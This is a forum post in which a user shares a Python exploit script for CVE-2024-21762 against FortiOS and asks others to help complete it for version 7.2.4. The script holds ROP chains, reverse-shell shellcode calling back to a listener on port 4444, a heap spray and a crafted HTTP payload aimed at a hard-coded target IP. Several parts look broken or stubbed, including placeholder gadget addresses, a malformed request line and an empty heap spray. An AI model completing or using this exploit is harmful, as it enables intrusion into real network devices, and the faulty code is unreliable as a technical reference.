
CVE-2024-21762 - need help improving for FortiOS v2.7.4

ivan_kuzmin

Here is a private version exploit for this CVE, if anyone could help me to complete it for FortiOS version 7.2.4 please DM me .


Python:
import socket
import ssl
import struct
import logging
import time

# Global variables
s_target_ip = "185.100.232.228"
s_target_port = 8443  # Adjust the port as needed
payload_offset = 0x100
buf_offset = 0x200
write_offset = 0x300
data_addr = 0x123456789abcdef0
gadget_pivot_1 = 0xdeadbeef  # Update with your actual gadget address
pc_data_offset = 0x400
evil_method = b'PUT'
symlink_name = "payload.txt"  # Update with your symlink name

# Set up logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)


# Define shellcode for fsread payload
def craft_shellcode_fsread(data_addr, symlink_name):
    sc = b''
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x000000000042fa18)  # : pop rsi ; ret
    sc += b'///////\x00'
    sc += struct.pack('<Q', 0x000000000042f69e)  # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x0000000000bc61ae)  # : mov qword ptr [rdi], rsi ; ret
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += b'/migadmi'
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x8)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += b'n/fonts/'
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x10)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042fa18)
    sc += struct.pack('8s', symlink_name.encode())
    sc += struct.pack('<Q', 0x000000000042f69e)
    sc += struct.pack('<Q', data_addr + 0x18)
    sc += struct.pack('<Q', 0x0000000000bc61ae)
    sc += struct.pack('<Q', 0x000000000042f69e)  # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x00000)  # : pop rsi ; ret
    sc += struct.pack('<Q', data_addr + 0x8)
    sc += struct.pack('<Q', 0x000000000051e0bb)  # : pop rax ; ret
    sc += struct.pack('<Q', 88)
    sc += struct.pack('<Q', 0x0000000000401ca8)  # : syscall
    return sc


# Define shellcode for reverse shell payload
def craft_shellcode_reverse_shell(target_ip, target_port):
    shellcode = (
        b"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2"  # Zero out registers
        b"\x52\x57\x48\x8d\x3c\x24\x48\x31\xc0\xb0\x02\x0f\x05"  # socket syscall
        b"\x48\x89\xc7\x48\x31\xc0\xb0\x02\x66\xc7\x44\x24\x02"  # Connect to target IP and port
        + struct.pack("!H", target_port) +
        socket.inet_aton(target_ip) +
        b"\x48\x89\xe6\x48\x31\xd2\xb2\x10\x48\x31\xc0\xb0\x29"  # syscall to socket
        b"\x0f\x05\x48\x89\xc2\x52\x48\x8d\x3c\x24\x48\x31\xc0"  # syscall to connect
        b"\xb0\x02\x0f\x05\x48\x31\xff\x48\xff\xc7\x48\x31\xc0"  # Write syscall
        b"\x48\x31\xf6\x48\x31\xd2\x48\x89\xe6\x48\x89\x54\x24"
        b"\x08\x48\x8b\x74\x24\x08\x48\x31\xc0\xb0\x21\x0f\x05"  # execve syscall
        b"\x48\x31\xff\x48\xff\xc7\x48\x31\xc0\xb0\x21\x0f\x05"  # execve syscall
    )
    return shellcode


# Define ROP chain for mprotect
def craft_rop_mprotect(data_addr):
    sc = b''
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x00000000004d25ec)  # : pop rcx ; ret
    sc += struct.pack('<Q', 0xfffffffffffe000) # -0x2000
    sc += struct.pack('<Q', 0x00000000011face0) # : add rdi, rcx ; xor eax, eax ; mov byte ptr [rdi], 0 ; pop rbp ; ret
    sc += struct.pack('<Q', 0xdeadbeaf)
    sc += struct.pack('<Q', 0x00000000004d25ec) # : pop rcx ; ret
    sc += struct.pack('<Q', 0xfffffff0) # : -0x10 & 0xFFffFFff
    sc += struct.pack('<Q', 0x000000000042fdc5) # : pop rdx ; ret
    sc += struct.pack('<Q', 7)
    sc += struct.pack('<Q', 0x000000000042fa18) # : pop rsi ; ret
    sc += struct.pack('<Q', 0x5000)
    sc += struct.pack('<Q', 0x000000000042f69e) # : pop rdi ; ret
    sc += struct.pack('<Q', data_addr)
    sc += struct.pack('<Q', 0x000000000042f080) # : call rax
    return sc

def create_ssl_socket(target_ip, target_port, auto_handshake=1):
    """Open a TLS client connection to ``target_ip:target_port`` and return the wrapped socket.

    Args:
        target_ip: Host to connect to; also passed as ``server_hostname`` (SNI).
        target_port: TCP port to connect to.
        auto_handshake: When truthy, ``do_handshake()`` is called explicitly
            after wrapping.

    Returns:
        An ``ssl.SSLSocket`` connected to the peer.

    Raises:
        ssl.SSLError: TLS failure (logged, then re-raised).
        OSError: connection failure (``socket.error`` is an alias of
            ``OSError``; logged, then re-raised).
        Exception: anything else is logged and re-raised unchanged.
    """
    try:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        # PROTOCOL_TLS_CLIENT turns on hostname checking and CERT_REQUIRED by
        # default; both are switched off below, so the peer certificate is
        # never validated and the remote endpoint is not authenticated.
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE # Disable certificate verification
        ctx.options |= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 # Disable SSLv2 and SSLv3
        ctx.options |= ssl.OP_NO_COMPRESSION # Disable compression

        sock = socket.create_connection((target_ip, target_port))
        # NOTE(review): wrap_socket() defaults to do_handshake_on_connect=True,
        # so on an already-connected socket the handshake has normally finished
        # here and the explicit call below looks redundant — confirm.
        ssl_sock = ctx.wrap_socket(sock, server_hostname=target_ip)
        if auto_handshake:
            ssl_sock.do_handshake()
        return ssl_sock
    except ssl.SSLError as e:
        # SSLError is a subclass of OSError, so it must be caught before socket.error.
        logger.error("SSL Error: %s" % str(e))
        raise
    except socket.error as e:
        # NOTE: if wrap_socket() fails, the plain `sock` is not closed in any handler here.
        logger.error("Socket Error: %s" % str(e))
        raise
    except Exception as e:
        logger.error("An error occurred: %s" % str(e))
        raise




# Perform heap spray
def do_heap_spray():
    try:
        logger.info("[*] Performing heap spray...")
        spray_sock = create_ssl_socket(s_target_ip, s_target_port, 0)
        # Perform heap spray operations here
        spray_sock.close()
        logger.info("[+] Heap spray successful!")
    except Exception as e:
        logger.error("Heap spray failed: %s" % str(e))
        raise


# Exploit function
def do_exploit():
    try:
        do_heap_spray()
        time.sleep(3)
        logger.info("[*] Preparing shellcode and reverse shell payload...")
        reverse_shell_payload = craft_shellcode_reverse_shell("192.168.100.1", 4444)
        shellcode_fsread = craft_shellcode_fsread(data_addr, symlink_name)
        rop_payload = craft_rop_mprotect(data_addr)
        logger.info("[*] Sending payload...")
        payload_data = b''
        payload_data += b'A' * payload_offset
        payload_data += reverse_shell_payload
        payload_data += b'B' * (buf_offset - payload_offset - len(reverse_shell_payload))
        payload_data += shellcode_fsread
        payload_data += b'C' * (write_offset - buf_offset - len(shellcode_fsread))
        payload_data += rop_payload
        payload_data += b'D' * (write_offset - buf_offset - len(rop_payload))
        payload_data += struct.pack('<Q', gadget_pivot_1) # ret gadget
        payload_data += struct.pack('<Q', data_addr + pc_data_offset)
        payload_header = b''
        payload_header += b'POST ' + evil_method + b' HTTP/1.1\r\n'
        payload_header += b'Host: ' + s_target_ip.encode() + b':' + str(s_target_port).encode() + b'\r\n'
        payload_header += b'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/95.0.4638.69 Safari/537.36\r\n'
        payload_header += b'Content-Length: ' + str(len(payload_data)).encode() + b'\r\n'
        payload_header += b'\r\n'
        payload_sock = create_ssl_socket(s_target_ip, s_target_port, 0)
        payload_sock.sendall(payload_header + payload_data)
        logger.info("[+] Vulnerability exploited successfully!")
    except Exception as e:
        logger.error("Exploit failed: %s" % str(e))
        raise


#Main function
def main():
    """Script entry point: run do_exploit() and log any exception before re-raising it."""
    try:
        do_exploit()
    except Exception as e:
        # do_exploit() already logs its own failure and re-raises, so the
        # same error is reported twice on this path.
        logger.error("An error occurred: %s" % str(e))
        raise


if __name__ == "__main__":
    main()